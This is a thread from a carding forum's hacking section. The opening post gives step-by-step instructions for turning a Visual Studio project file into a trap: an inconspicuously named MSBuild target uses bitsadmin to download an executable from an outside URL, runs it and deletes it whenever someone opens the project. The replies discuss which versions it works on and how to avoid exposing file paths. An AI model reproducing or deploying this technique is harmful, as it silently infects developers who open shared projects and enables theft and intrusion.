Go Back   Carder.life > [en] International Forum > Hacking & Coding



Reply
 
Thread Tools Display Modes
  #1  
Old 04-01-2025, 03:03 PM

negdwol119 negdwol119 is offline
Join Date: Apr 2024
Posts: 0
Default


Step 1: Create a new project in visual studio
Step 2: Find the .vbproj/.csproj file and edit it
Step 3: On the second line, it should have something similar to this
Code:
<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

Edit this like to include
Code:
InitialTargets="Build"

The name can be whatever you want, I just thought "build" would be inconspicuous
The final product will look like:
Code:
<Project ToolsVersion="14.0" InitialTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

Step 4:
Add this to the end of the file, but before the closing "</project>" tag
Code:
<Target Name="Buislfd">
<Exec Command="bitsadmin.exe /transfer NAME http://directdownload.to/your.exe %temp%\1.exe" >
<Output TaskParameter="ExitCode" PropertyName="ErrorCode" />
</Exec>
<Exec Command="%temp%\1.exe" >
<Output TaskParameter="ExitCode" PropertyName="ErrorCode" />
</Exec>
<Exec Command="del %temp%\1.exe" >
<Output TaskParameter="ExitCode" PropertyName="ErrorCode" />
</Exec>
<Message Importance="high" Text="$(ErrorCode)" />
</Target>

And save the file
Now, whenever someone runs opens your project in Visual Studio, it will download and exec your file
  #2  
Old 04-01-2025, 03:29 PM

v3dro1d v3dro1d is offline
Banned
Join Date: Jan 2022
Posts: 0
Default


VisualStudio what ver?
2016 pro not work

  #3  
Old 04-01-2025, 03:42 PM

negdwol119 negdwol119 is offline
Join Date: Apr 2024
Posts: 0
Default



  #4  
Old 04-01-2025, 03:54 PM

apex apex is offline
Join Date: Dec 2022
Posts: 0
Default


Quote:
Originally Posted by FeRMi8
Careful with screen recorder bro.. File paths load on Visual Studio screen
Reply

Tags
NULL


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is On

Forum Jump




All times are GMT. The time now is 03:41 AM.